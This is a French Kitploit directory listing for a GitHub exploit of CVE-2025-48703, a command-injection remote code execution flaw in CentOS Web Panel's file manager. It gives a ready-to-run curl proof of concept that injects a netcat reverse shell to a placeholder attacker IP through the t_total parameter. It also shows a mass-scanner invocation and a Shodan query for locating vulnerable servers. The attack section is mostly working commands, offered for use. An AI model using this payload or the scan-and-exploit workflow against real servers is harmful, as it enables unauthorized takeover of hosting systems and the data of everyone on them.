Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-48703 — Exécution de code à distance dans CentOS Web Panel | Kitploit
Outils/GitHubGitHub/skynoxk/cve-2025-48703
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubskynoxk/cve-2025-48703

CVE-2025-48703

Exécution de code à distance dans CentOS Web Panel

Voir le dépôt
313il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ CVE-2025-48703 - Exécution de code à distance (RCE) dans le gestionnaire de fichiers de cPanel

📌 Description

CVE-2025-48703 est une vulnérabilité d'exécution de code à distance (RCE) dans le module filemanager d'un panneau de contrôle d'hébergement web (par exemple, cPanel). Elle est due à un traitement non assaini des entrées dans la fonction acc=changePerm, ce qui permet à un attaquant d'injecter et d'exécuter des commandes système arbitraires à l'aide du paramètre t_total.


🧨 Impact

Cette vulnérabilité permet aux attaquants de :

  • Exécuter des commandes arbitraires sur le serveur cible.
  • Établir un shell inversé pour un accès persistant.
  • Potentiellement élever les privilèges ou se déplacer latéralement.

⚠️ Cette attaque peut être réalisée avec une authentification minimale ou, dans certaines configurations, sans authentification.


🚀 Preuve de concept (PoC)

✅ Commande de shell inversé

Télécharger l’outil
root@kitploit:~
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'

Utilisation du scanner

root@kitploit:~
python3 Scanner.py  #Make sure targets.txt is in the same dir

Recherche Shodan

root@kitploit:~
Server: cwpsrv

Référence: https://fenrisk.com/rce-centos-webpanel